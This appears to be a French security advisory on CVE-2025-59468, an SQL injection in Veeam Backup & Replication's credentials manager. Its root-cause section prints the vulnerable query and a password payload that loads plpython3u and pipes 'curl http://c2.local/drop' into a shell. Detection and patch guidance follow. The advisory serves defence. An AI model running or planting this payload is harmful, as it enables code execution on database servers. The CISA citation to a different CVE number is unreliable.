CVE-2025-59468 : exécution de code PostgreSQL via le paramètre password dans Veeam Backup & Replication
HERMES THREAT SCORE & RISQUE DE GESTIONNAIRE D'IDENTIFIANTS
Cible :Module de gestion des identifiants et base PostgreSQL Veeam Backup & Replication Hermes classe la CVE-2025-59468 à 90 (CRITIQUE). Bien que la soumission d'identifiants requière des privilèges d'administration sur la console, l'injection permet de s'extraire de l'application pour exécuter des commandes directement au niveau de la couche de données PostgreSQL. Cette faille facilite le mouvement latéral furtif et le dépôt d'implants de persistance dans le cluster de base de données sans déclencher les alertes de l'interface graphique.
CVE-2025-59468: PostgreSQL Remote Code Execution via Malicious Password Parameter in Veeam Backup & ReplicationVULNÉRABILITÉ
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in Veeam Backup & Replication documented in Hermes dossier.”
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Métadonnées et surface d’attaque
Section intitulée « 1. Métadonnées et surface d’attaque »| Paramètre | Spécification technique | Impact opérationnel |
|---|---|---|
| Identifiant CVE | CVE-2025-59468 | Identifiant officiel NVD / MITRE |
| Avis de sécurité éditeur | Veeam KB4716 | Correctif de sécurité cumulatif VBR v13 |
| Composant affecté | Gestionnaire d’identifiants (Credentials Manager) | Enregistrement des secrets d’infrastructure |
| Versions affectées | VBR 13.x $\le$ 13.0.1.180 | Installations sous PostgreSQL |
| Version corrigée | Veeam Backup & Replication 13.0.1.1071 | Mise à niveau recommandée |
| Privilèges requis | Backup Administrator (authentifié) | Console VBR ou API d’administration |
| Impact final | Exécution de code postgres | Persistance base de données et RCE |
2. Analyse technique de la cause racine
Section intitulée « 2. Analyse technique de la cause racine »Le gestionnaire de secrets de Veeam prend en charge le chiffrement asymétrique des mots de passe. Toutefois, avant le passage dans l’algorithme de chiffrement, une routine de vérification de conformité et d’insertion temporaire dans la table de session utilisait une chaîne SQL dynamique :
// Modèle conceptuel du bug :string insertSql = $"INSERT INTO temp_credentials (user_id, raw_entropy, test_hash) VALUES ('{userId}', '{passwordInput}', '{hash}')";En fournissant un mot de passe contenant des délimiteurs de requête :
P@ssword123'; CREATE EXTENSION IF NOT EXISTS plpython3u; DO $$ import os; os.system('curl http://c2.local/drop | sh') $$; --Le serveur PostgreSQL interprète le mot de passe comme une séquence d’instructions SQL complètes, exécutant les commandes sous l’identité de l’instance PostgreSQL.
3. Stratégie de détection et remédiation
Section intitulée « 3. Stratégie de détection et remédiation »Requête de Threat Hunting PostgreSQL
Section intitulée « Requête de Threat Hunting PostgreSQL »index=postgresql_logs ("CREATE EXTENSION" OR "COPY" OR "DO $$")(query="*temp_credentials*" OR query="*credentials*")| table _time user database query client_addrMesures correctives
Section intitulée « Mesures correctives »- Appliquer immédiatement le correctif KB4716 : mettre à niveau vers la version 13.0.1.1071.
- Surveillance des requêtes DDL suspectes : activer l’extension
pgauditpour tracer les instructionsDOetCREATE EXTENSIONsur la base Veeam. - Segmentation réseau du serveur de sauvegarde : isoler le serveur VBR des flux sortants non sollicités vers Internet.
4. Références
Section intitulée « 4. Références »- Bulletin de sécurité officiel : Veeam Security Bulletin KB4716
- Base NIST NVD : CVE-2025-59468 Detail